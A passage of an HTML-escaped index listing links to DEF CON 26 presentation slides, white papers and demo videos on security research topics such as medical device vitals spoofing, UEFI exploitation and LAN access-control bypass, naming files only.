&lt;li&gt;&lt;a href="https://media.defcon.org/DEF%20CON%2026/DEF%20CON%2026%20presentations/Dongsung%20Kim%20and%20Hyoung%20Kee%20Choi%20-%20Updated/DEFCON-26-Dongsung-Kim-and-Hyoung-Kee-Choi-Your-Watch-Can-Watch-You-Demo-Video.mp4"&gt;Dongsung-Kim-and-Hyoung-Kee-Choi-Your-Watch-Can-Watch-You-Demo-Video.mp4&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://media.defcon.org/DEF%20CON%2026/DEF%20CON%2026%20presentations/Dongsung%20Kim%20and%20Hyoung%20Kee%20Choi%20-%20Updated/DEFCON-26-Dongsung-Kim-and-Hyoung-Kee-Choi-Your-Watch-Can-Watch-You-Updated.pdf"&gt;Dongsung-Kim-and-Hyoung-Kee-Choi-Your-Watch-Can-Watch-You-Updated.pdf&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;Douglas Mckee

&lt;ul&gt;
&lt;li&gt;DEFCON-26-Douglas-McKee-Demo-Videos

&lt;ul&gt;
&lt;li&gt;&lt;a href="https://media.defcon.org/DEF%20CON%2026/DEF%20CON%2026%20presentations/Douglas%20Mckee/DEFCON-26-Douglas-McKee-Demo-Videos/30To180-2.mp4"&gt;30To180-2.mp4&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://media.defcon.org/DEF%20CON%2026/DEF%20CON%2026%20presentations/Douglas%20Mckee/DEFCON-26-Douglas-McKee-Demo-Videos/80To180-2.mp4"&gt;80To180-2.mp4&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://media.defcon.org/DEF%20CON%2026/DEF%20CON%2026%20presentations/Douglas%20Mckee/DEFCON-26-Douglas-McKee-Demo-Videos/Emulation.mp4"&gt;Emulation.mp4&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://media.defcon.org/DEF%20CON%2026/DEF%20CON%2026%20presentations/Douglas%20Mckee/DEFCON-26-Douglas-McKee-Demo-Videos/FlatlineDemo2.mp4"&gt;FlatlineDemo2.mp4&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;&lt;a href="https://media.defcon.org/DEF%20CON%2026/DEF%20CON%2026%20presentations/Douglas%20Mckee/DEFCON-26-Douglas-McKee-80-to-0-in-5-sec-falsifying-medical-pt-vitals.pdf"&gt;Douglas-McKee-80-to-0-in-5-sec-falsifying-medical-pt-vitals.pdf&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;Douglas Mckee - Updated

&lt;ul&gt;
&lt;li&gt;&lt;a href="https://media.defcon.org/DEF%20CON%2026/DEF%20CON%2026%20presentations/Douglas%20Mckee%20-%20Updated/DEFCON-26-Douglas-McKee-80-to-0-in-5-sec-falsifying-medical-pt-vitals-updated.pdf"&gt;Douglas-McKee-80-to-0-in-5-sec-falsifying-medical-pt-vitals-updated.pdf&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://media.defcon.org/DEF%20CON%2026/DEF%20CON%2026%20presentations/Douglas%20Mckee%20-%20Updated/DEFCON-26-Douglas-McKee-80-to-0-in-5-sec-falsifying-medical-pt-vitals-updated.pptx"&gt;Douglas-McKee-80-to-0-in-5-sec-falsifying-medical-pt-vitals-updated.pptx&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;Eric Sesterhenn

&lt;ul&gt;
&lt;li&gt;DEFCON-26-Eric-Sesterhenn-Demo-Videos

&lt;ul&gt;
&lt;li&gt;&lt;a href="https://media.defcon.org/DEF%20CON%2026/DEF%20CON%2026%20presentations/Eric%20Sesterhenn/DEFCON-26-Eric-Sesterhenn-Demo-Videos/DEFCON-26-Eric-Sesterhenn-Soviet-Russia-Smartcard-Hacks-You-PoC1.mp4"&gt;Eric-Sesterhenn-Soviet-Russia-Smartcard-Hacks-You-PoC1.mp4&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://media.defcon.org/DEF%20CON%2026/DEF%20CON%2026%20presentations/Eric%20Sesterhenn/DEFCON-26-Eric-Sesterhenn-Demo-Videos/DEFCON-26-Eric-Sesterhenn-Soviet-Russia-Smartcard-Hacks-You-PoC2.mp4"&gt;Eric-Sesterhenn-Soviet-Russia-Smartcard-Hacks-You-PoC2.mp4&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;&lt;a href="https://media.defcon.org/DEF%20CON%2026/DEF%20CON%2026%20presentations/Eric%20Sesterhenn/DEFCON-26-Eric-Sesterhenn-Soviet-Russia-Smartcard-Hacks-You.pdf"&gt;Eric-Sesterhenn-Soviet-Russia-Smartcard-Hacks-You.pdf&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;Feng Xiao - Jianwei Huang - Peng Liu

&lt;ul&gt;
&lt;li&gt;&lt;a href="https://media.defcon.org/DEF%20CON%2026/DEF%20CON%2026%20presentations/Feng%20Xiao%20-%20Jianwei%20Huang%20-%20Peng%20Liu/DEFCON-26-Xiao-Huang-Liu-Hacking-the-Brain-Custom-Attack-SDN-Controller.pdf"&gt;Xiao-Huang-Liu-Hacking-the-Brain-Custom-Attack-SDN-Controller.pdf&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://media.defcon.org/DEF%20CON%2026/DEF%20CON%2026%20presentations/Feng%20Xiao%20-%20Jianwei%20Huang%20-%20Peng%20Liu/Huang-Liu-Hacking-the-Brain-Custom-Attack-SDN-Controller-Demo-Video.mp4"&gt;Huang-Liu-Hacking-the-Brain-Custom-Attack-SDN-Controller-Demo-Video.mp4&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;Gabriel Ryan

&lt;ul&gt;
&lt;li&gt;DEFCON-26-Gabriel-Ryan-Demo-Videos

&lt;ul&gt;
&lt;li&gt;&lt;a href="https://media.defcon.org/DEF%20CON%2026/DEF%20CON%2026%20presentations/Gabriel%20Ryan/DEFCON-26-Gabriel-Ryan-Demo-Videos/DEFCON-26-Gabriel-Ryan-bait-n-switch.mp4"&gt;Gabriel-Ryan-bait-n-switch.mp4&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://media.defcon.org/DEF%20CON%2026/DEF%20CON%2026%20presentations/Gabriel%20Ryan/DEFCON-26-Gabriel-Ryan-Demo-Videos/DEFCON-26-Gabriel-Ryan-bypass-mab.mp4"&gt;Gabriel-Ryan-bypass-mab.mp4&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://media.defcon.org/DEF%20CON%2026/DEF%20CON%2026%20presentations/Gabriel%20Ryan/DEFCON-26-Gabriel-Ryan-Demo-Videos/DEFCON-26-Gabriel-Ryan-classic-8021x-bypass-with-interaction%20(1920%20x%201080).mp4"&gt;Gabriel-Ryan-classic-8021x-bypass-with-interaction (1920 x 1080).mp4&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://media.defcon.org/DEF%20CON%2026/DEF%20CON%2026%20presentations/Gabriel%20Ryan/DEFCON-26-Gabriel-Ryan-Demo-Videos/DEFCON-26-Gabriel-Ryan-classic-8021x-bypass-with-interaction.mp4"&gt;Gabriel-Ryan-classic-8021x-bypass-with-interaction.mp4&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://media.defcon.org/DEF%20CON%2026/DEF%20CON%2026%20presentations/Gabriel%20Ryan/DEFCON-26-Gabriel-Ryan-Demo-Videos/DEFCON-26-Gabriel-Ryan-eap-md5-forced-reauth-full.mp4"&gt;Gabriel-Ryan-eap-md5-forced-reauth-full.mp4&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://media.defcon.org/DEF%20CON%2026/DEF%20CON%2026%20presentations/Gabriel%20Ryan/DEFCON-26-Gabriel-Ryan-Demo-Videos/DEFCON-26-Gabriel-Ryan-rogue-gateway-final%20(1920%20x%201080).mp4"&gt;Gabriel-Ryan-rogue-gateway-final (1920 x 1080).mp4&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://media.defcon.org/DEF%20CON%2026/DEF%20CON%2026%20presentations/Gabriel%20Ryan/DEFCON-26-Gabriel-Ryan-Demo-Videos/DEFCON-26-Gabriel-Ryan-rogue-gateway-final.mp4"&gt;Gabriel-Ryan-rogue-gateway-final.mp4&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://media.defcon.org/DEF%20CON%2026/DEF%20CON%2026%20presentations/Gabriel%20Ryan/DEFCON-26-Gabriel-Ryan-Demo-Videos/DEFCON-26-Gabriel-Ryan-ryan-gabriel-ryan-bait-n-switch%20(1920%20x%201080).mp4"&gt;Gabriel-Ryan-ryan-gabriel-ryan-bait-n-switch (1920 x 1080).mp4&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://media.defcon.org/DEF%20CON%2026/DEF%20CON%2026%20presentations/Gabriel%20Ryan/DEFCON-26-Gabriel-Ryan-Demo-Videos/DEFCON-26-Gabriel-Ryanforged-eapol-start.mp4"&gt;Gabriel-Ryanforged-eapol-start.mp4&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;&lt;a href="https://media.defcon.org/DEF%20CON%2026/DEF%20CON%2026%20presentations/Gabriel%20Ryan/DEFCON-26-Gabriel-Ryan-Owning-the-LAN-in-2018-WP.pdf"&gt;Gabriel-Ryan-Owning-the-LAN-in-2018-WP.pdf&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://media.defcon.org/DEF%20CON%2026/DEF%20CON%2026%20presentations/Gabriel%20Ryan/DEFCON-26-Gabriel-Ryan-Owning-the-LAN-in-2018.pdf"&gt;Gabriel-Ryan-Owning-the-LAN-in-2018.pdf&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;Joe Rozner

&lt;ul&gt;
&lt;li&gt;&lt;a href="https://media.defcon.org/DEF%20CON%2026/DEF%20CON%2026%20presentations/Joe%20Rozner/DEFCON-26-Joe-Rozner-Demo-Video.mp4"&gt;Joe-Rozner-Demo-Video.mp4&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://media.defcon.org/DEF%20CON%2026/DEF%20CON%2026%20presentations/Joe%20Rozner/DEFCON-26-Joe-Rozner-RE-Targetable-Grammer-Based-Test-Case-Generation-Synfuzz.pdf"&gt;Joe-Rozner-RE-Targetable-Grammer-Based-Test-Case-Generation-Synfuzz.pdf&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;John Seymour and Azeem Aqil

&lt;ul&gt;
&lt;li&gt;DEFCON-26-John-Seymour-and-Azeem-Aqil-Demo-Videos

&lt;ul&gt;
&lt;li&gt;&lt;a href="https://media.defcon.org/DEF%20CON%2026/DEF%20CON%2026%20presentations/John%20Seymour%20and%20Azeem%20Aqil/DEFCON-26-John-Seymour-and-Azeem-Aqil-Demo-Videos/07-01.mp4"&gt;07-01.mp4&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://media.defcon.org/DEF%20CON%2026/DEF%20CON%2026%20presentations/John%20Seymour%20and%20Azeem%20Aqil/DEFCON-26-John-Seymour-and-Azeem-Aqil-Demo-Videos/10-01-trimmed.mp4"&gt;10-01-trimmed.mp4&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://media.defcon.org/DEF%20CON%2026/DEF%20CON%2026%20presentations/John%20Seymour%20and%20Azeem%20Aqil/DEFCON-26-John-Seymour-and-Azeem-Aqil-Demo-Videos/13-01.mp4"&gt;13-01.mp4&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://media.defcon.org/DEF%20CON%2026/DEF%20CON%2026%20presentations/John%20Seymour%20and%20Azeem%20Aqil/DEFCON-26-John-Seymour-and-Azeem-Aqil-Demo-Videos/16-01.wav"&gt;16-01.wav&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://media.defcon.org/DEF%20CON%2026/DEF%20CON%2026%20presentations/John%20Seymour%20and%20Azeem%20Aqil/DEFCON-26-John-Seymour-and-Azeem-Aqil-Demo-Videos/16-02.wav"&gt;16-02.wav&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://media.defcon.org/DEF%20CON%2026/DEF%20CON%2026%20presentations/John%20Seymour%20and%20Azeem%20Aqil/DEFCON-26-John-Seymour-and-Azeem-Aqil-Demo-Videos/16-03.wav"&gt;16-03.wav&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://media.defcon.org/DEF%20CON%2026/DEF%20CON%2026%20presentations/John%20Seymour%20and%20Azeem%20Aqil/DEFCON-26-John-Seymour-and-Azeem-Aqil-Demo-Videos/21-01.wav"&gt;21-01.wav&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://media.defcon.org/DEF%20CON%2026/DEF%20CON%2026%20presentations/John%20Seymour%20and%20Azeem%20Aqil/DEFCON-26-John-Seymour-and-Azeem-Aqil-Demo-Videos/21-02.wav"&gt;21-02.wav&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;&lt;a href="https://media.defcon.org/DEF%20CON%2026/DEF%20CON%2026%20presentations/John%20Seymour%20and%20Azeem%20Aqil/DEFCON-26-John-Seymour-and-Azeem-Aqil-Your-Voice-is-My-Passport.pdf"&gt;John-Seymour-and-Azeem-Aqil-Your-Voice-is-My-Passport.pdf&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;Josep Rodriguez

&lt;ul&gt;
&lt;li&gt;&lt;a href="https://media.defcon.org/DEF%20CON%2026/DEF%20CON%2026%20presentations/Josep%20Rodriguez/DEFCON-26-Josep-Rodriguez-Breaking-Extreme-Networks-WingOS.pdf"&gt;Josep-Rodriguez-Breaking-Extreme-Networks-WingOS.pdf&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://media.defcon.org/DEF%20CON%2026/DEF%20CON%2026%20presentations/Josep%20Rodriguez/Josep-Rodriguez-Breaking-Extreme-Networks-WingOS-Demo-Video.mp4"&gt;Josep-Rodriguez-Breaking-Extreme-Networks-WingOS-Demo-Video.mp4&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;L0pht Panel

&lt;ul&gt;
&lt;li&gt;&lt;a href="https://media.defcon.org/DEF%20CON%2026/DEF%20CON%2026%20presentations/L0pht%20Panel/DEFCON-26-L0pht-Testimony-20-years-later.pdf"&gt;L0pht-Testimony-20-years-later.pdf&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;Leigh Anne Galloway and Tim Yunusov

&lt;ul&gt;
&lt;li&gt;DEFCON-26-Galloway-and-Yunusov-Demo-Videos

&lt;ul&gt;
&lt;li&gt;&lt;a href="https://media.defcon.org/DEF%20CON%2026/DEF%20CON%2026%20presentations/Leigh%20Anne%20Galloway%20and%20Tim%20Yunusov/DEFCON-26-Galloway-and-Yunusov-Demo-Videos/DEFCON-26-Galloway-and-Yunusov-RCE.mp4"&gt;Galloway-and-Yunusov-RCE.mp4&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://media.defcon.org/DEF%20CON%2026/DEF%20CON%2026%20presentations/Leigh%20Anne%20Galloway%20and%20Tim%20Yunusov/DEFCON-26-Galloway-and-Yunusov-Demo-Videos/DEFCON-26-Galloway-and-Yunusov-arbitrary-code.mp4"&gt;Galloway-and-Yunusov-arbitrary-code.mp4&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://media.defcon.org/DEF%20CON%2026/DEF%20CON%2026%20presentations/Leigh%20Anne%20Galloway%20and%20Tim%20Yunusov/DEFCON-26-Galloway-and-Yunusov-Demo-Videos/DEFCON-26-Galloway-and-Yunusov-modifying-amount.mp4"&gt;Galloway-and-Yunusov-modifying-amount.mp4&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;&lt;a href="https://media.defcon.org/DEF%20CON%2026/DEF%20CON%2026%20presentations/Leigh%20Anne%20Galloway%20and%20Tim%20Yunusov/DEFCON-26-Galloway-and-Yunusov-For-the-love-of-money-Findingexploiting-vulns-in-mobile-pos-terminals.pdf"&gt;Galloway-and-Yunusov-For-the-love-of-money-Findingexploiting-vulns-in-mobile-pos-terminals.pdf&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;Louis Dion Marcil

&lt;ul&gt;
&lt;li&gt;DEFCON-26-Louis-Dion-Marcil-Demo-Videos

&lt;ul&gt;
&lt;li&gt;&lt;a href="https://media.defcon.org/DEF%20CON%2026/DEF%20CON%2026%20presentations/Louis%20Dion%20Marcil/DEFCON-26-Louis-Dion-Marcil-Demo-Videos/demo1.mp4"&gt;demo1.mp4&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://media.defcon.org/DEF%20CON%2026/DEF%20CON%2026%20presentations/Louis%20Dion%20Marcil/DEFCON-26-Louis-Dion-Marcil-Demo-Videos/demo2.mp4"&gt;demo2.mp4&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;&lt;a href="https://media.defcon.org/DEF%20CON%2026/DEF%20CON%2026%20presentations/Louis%20Dion%20Marcil/DEFCON-26-Louis-Dion-Marcil-Edge-Side-Include-Injection.pdf"&gt;Louis-Dion-Marcil-Edge-Side-Include-Injection.pdf&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;Martin Vigo

&lt;ul&gt;
&lt;li&gt;DEFCON-26-Martin-Vigo-Demo-Videos

&lt;ul&gt;
&lt;li&gt;&lt;a href="https://media.defcon.org/DEF%20CON%2026/DEF%20CON%2026%20presentations/Martin%20Vigo/DEFCON-26-Martin-Vigo-Demo-Videos/demo-bruteforcing-v1.mp4"&gt;demo-bruteforcing-v1.mp4&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://media.defcon.org/DEF%20CON%2026/DEF%20CON%2026%20presentations/Martin%20Vigo/DEFCON-26-Martin-Vigo-Demo-Videos/demo-paypal-v1.mp4"&gt;demo-paypal-v1.mp4&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://media.defcon.org/DEF%20CON%2026/DEF%20CON%2026%20presentations/Martin%20Vigo/DEFCON-26-Martin-Vigo-Demo-Videos/demo-whatsapp-v1.mp4"&gt;demo-whatsapp-v1.mp4&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;&lt;a href="https://media.defcon.org/DEF%20CON%2026/DEF%20CON%2026%20presentations/Martin%20Vigo/DEFCON-26-Martin-Vigo-Compromising-Online-Cracking-Voicemail-Systems.pdf"&gt;Martin-Vigo-Compromising-Online-Cracking-Voicemail-Systems.pdf&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;Michael West and Collin Campbell

&lt;ul&gt;
&lt;li&gt;&lt;a href="https://media.defcon.org/DEF%20CON%2026/DEF%20CON%2026%20presentations/Michael%20West%20and%20Collin%20Campbell/DEFCON-26-Micheal-West-Colin-Campbell-barcOwned-Popping-shells-with-your-cereal%20box.pdf"&gt;Micheal-West-Colin-Campbell-barcOwned-Popping-shells-with-your-cereal box.pdf&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://media.defcon.org/DEF%20CON%2026/DEF%20CON%2026%20presentations/Michael%20West%20and%20Collin%20Campbell/DEFCON-26-Micheal-West-Colin-Campbell-barcOwned-Popping-shells-with-your-cereal%20box.pptx"&gt;Micheal-West-Colin-Campbell-barcOwned-Popping-shells-with-your-cereal box.pptx&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;Mickey Shkatov and Jesse Micheal

&lt;ul&gt;
&lt;li&gt;DEFCON-26-Mickey-Shkatov-and-Jesse-Micheal-Demo-Videos

&lt;ul&gt;
&lt;li&gt;&lt;a href="https://media.defcon.org/DEF%20CON%2026/DEF%20CON%2026%20presentations/Mickey%20Shkatov%20and%20Jesse%20Micheal/DEFCON-26-Mickey-Shkatov-and-Jesse-Micheal-Demo-Videos/EvilMaid-BennyHill-Defcon-Video1.mp4"&gt;EvilMaid-BennyHill-Defcon-Video1.mp4&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://media.defcon.org/DEF%20CON%2026/DEF%20CON%2026%20presentations/Mickey%20Shkatov%20and%20Jesse%20Micheal/DEFCON-26-Mickey-Shkatov-and-Jesse-Micheal-Demo-Videos/exploit-popcalc-text-Defcon-Video2.MP4"&gt;exploit-popcalc-text-Defcon-Video2.MP4&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://media.defcon.org/DEF%20CON%2026/DEF%20CON%2026%20presentations/Mickey%20Shkatov%20and%20Jesse%20Micheal/DEFCON-26-Mickey-Shkatov-and-Jesse-Micheal-Demo-Videos/exploit-popcalc-win10-Defcon-Video3.MP4"&gt;exploit-popcalc-win10-Defcon-Video3.MP4&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://media.defcon.org/DEF%20CON%2026/DEF%20CON%2026%20presentations/Mickey%20Shkatov%20and%20Jesse%20Micheal/DEFCON-26-Mickey-Shkatov-and-Jesse-Micheal-Demo-Videos/exploit-shell-Defcon-Video4.MP4"&gt;exploit-shell-Defcon-Video4.MP4&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://media.defcon.org/DEF%20CON%2026/DEF%20CON%2026%20presentations/Mickey%20Shkatov%20and%20Jesse%20Micheal/DEFCON-26-Mickey-Shkatov-and-Jesse-Micheal-Demo-Videos/exploit-smileyloop.MP4"&gt;exploit-smileyloop.MP4&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;&lt;a href="https://media.defcon.org/DEF%20CON%2026/DEF%20CON%2026%20presentations/Mickey%20Shkatov%20and%20Jesse%20Micheal/DEFCON-26-Mickey-Shkatov-and-Jesse-Micheal-UEFI-Exploitation-For-The-Masses.pdf"&gt;Mickey-Shkatov-and-Jesse-Micheal-UEFI-Exploitation-For-The-Masses.pdf&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;Morgan Gangwere

&lt;ul&gt;
&lt;li&gt;DEFCON-26-Morgan-Gangwere-Its-assembler-jim-Demo-Videos

&lt;ul&gt;
&lt;li&gt;&lt;a href="https://media.defcon.org/DEF%20CON%2026/DEF%20CON%2026%20presentations/Morgan%20Gangwere/DEFCON-26-Morgan-Gangwere-Its-assembler-jim-Demo-Videos/demo-1-rootfs.mp4"&gt;demo-1-rootfs.mp4&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://media.defcon.org/DEF%20CON%2026/DEF%20CON%2026%20presentations/Morgan%20Gangwere/DEFCON-26-Morgan-Gangwere-Its-assembler-jim-Demo-Videos/demo-2-tapdrive.mp4"&gt;demo-2-tapdrive.mp4&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://media.defcon.org/DEF%20CON%2026/DEF%20CON%2026%20presentations/Morgan%20Gangwere/DEFCON-26-Morgan-Gangwere-Its-assembler-jim-Demo-Videos/demo-3-containers.mp4"&gt;demo-3-containers.mp4&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://media.defcon.org/DEF%20CON%2026/DEF%20CON%2026%20presentations/Morgan%20Gangwere/DEFCON-26-Morgan-Gangwere-Its-assembler-jim-Demo-Videos/demo-4-afl.mp4"&gt;demo-4-afl.mp4&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;&lt;a href="https://media.defcon.org/DEF%20CON%2026/DEF%20CON%2026%20presentations/Morgan%20Gangwere/DEFCON-26-Morgan-Gangwere-Its-assembler-jim-Notes.pdf"&gt;Morgan-Gangwere-Its-assembler-jim-Notes.pdf&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://media.defcon.org/DEF%20CON%2026/DEF%20CON%2026%20presentations/Morgan%20Gangwere/DEFCON-26-Morgan-Gangwere-Its-assembler-jim.pdf"&gt;Morgan-Gangwere-Its-assembler-jim.pdf&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;Nafeez

&lt;ul&gt;
&lt;li&gt;&lt;a href="https://media.defcon.org/DEF%20CON%2026/DEF%20CON%2026%20presentations/Nafeez/DEFCON-26-Nafeez-Compression-Oracle-attacks-on-VPN-Networks-openvpn3-voracle.gif"&gt;Nafeez-Compression-Oracle-attacks-on-VPN-Networks-openvpn3-voracle.gif&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://media.defcon.org/DEF%20CON%2026/DEF%20CON%2026%20presentations/Nafeez/DEFCON-26-Nafeez-Compression-Oracle-attacks-on-VPN-Networks.pdf"&gt;Nafeez-Compression-Oracle-attacks-on-VPN-Networks.pdf&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;Nick Cano

&lt;ul&gt;
&lt;li&gt;DEFCON-26-Nick-Cano-Demo-Videos

&lt;ul&gt;
&lt;li&gt;&lt;a href="https://media.defcon.org/DEF%20CON%2026/DEF%20CON%2026%20presentations/Nick%20Cano/DEFCON-26-Nick-Cano-Demo-Videos/demo-1-tools.mp4"&gt;demo-1-tools.mp4&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://media.defcon.org/DEF%20CON%2026/DEF%20CON%2026%20presentations/Nick%20Cano/DEFCON-26-Nick-Cano-Demo-Videos/demo-2-launch.mp4"&gt;demo-2-launch.mp4&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://media.defcon.org/DEF%20CON%2026/DEF%20CON%2026%20presentations/Nick%20Cano/DEFCON-26-Nick-Cano-Demo-Videos/demo-3-scan.mp4"&gt;demo-3-scan.mp4&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://media.defcon.org/DEF%20CON%2026/DEF%20CON%2026%20presentations/Nick%20Cano/DEFCON-26-Nick-Cano-Demo-Videos/demo-4-win10.mp4"&gt;demo-4-win10.mp4&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;&lt;a href="https://media.defcon.org/DEF%20CON%2026/DEF%20CON%2026%20presentations/Nick%20Cano/DEFCON-26-Nick-Cano-Relocation-Bonus-Attacking-the-Win-Loader.pdf"&gt;Nick-Cano-Relocation-Bonus-Attacking-the-Win-Loader.pdf&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;Patrick Wardle

&lt;ul&gt;
&lt;li&gt;&lt;a href="https://media.defcon.org/DEF%20CON%2026/DEF%20CON%2026%20presentations/Patrick%20Wardle/DEFCON-26-Patrick-Wardle-Fire-and-Ice.pdf"&gt;Patrick-Wardle-Fire-and-Ice.pdf&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://media.defcon.org/DEF%20CON%2026/DEF%20CON%2026%20presentations/Patrick%20Wardle/DEFCON-26-Patrick-Wardle-The-Mouse-Is-Mightier-Synthetic0Reality.pdf"&gt;Patrick-Wardle-The-Mouse-Is-Mightier-Synthetic0Reality.pdf&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;Ruo Ando

&lt;ul&gt;
&lt;li&gt;&lt;a href="https://media.defcon.org/DEF%20CON%2026/DEF%20CON%2026%20presentations/Ruo%20Ando/DEFCON-26-Ruo-Ando-Asura-Demo-Video.MP4"&gt;Ruo-Ando-Asura-Demo-Video.MP4&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://media.defcon.org/DEF%20CON%2026/DEF%20CON%2026%20presentations/Ruo%20Ando/DEFCON-26-Ruo-Ando-Asura-PCAP-File-Analyzer-for-Anomaly-Packet-Detection-Multithreading-WP.pdf"&gt;Ruo-Ando-Asura-PCAP-File-Analyzer-for-Anomaly-Packet-Detection-Multithreading-WP.pdf&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://media.defcon.org/DEF%20CON%2026/DEF%20CON%2026%20presentations/Ruo%20Ando/DEFCON-26-Ruo-Ando-Asura-PCAP-File-Analyzer-for-Anomaly-Packet-Detection-Multithreading.pdf"&gt;Ruo-Ando-Asura-PCAP-File-Analyzer-for-Anomaly-Packet-Detection-Multithreading.pdf&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;Ryan Johnson and Angelos Stavrou

&lt;ul&gt;
&lt;li&gt;DEFCON-26-Johnson-and-Stavrou-Demo-Videos

&lt;ul&gt;
&lt;li&gt;&lt;a href="https://media.defcon.org/DEF%20CON%2026/DEF%20CON%2026%20presentations/Ryan%20Johnson%20and%20Angelos%20Stavrou/DEFCON-26-Johnson-and-Stavrou-Demo-Videos/commexec.mp4"&gt;commexec.mp4&lt;/a&gt;&lt;/li&gt;
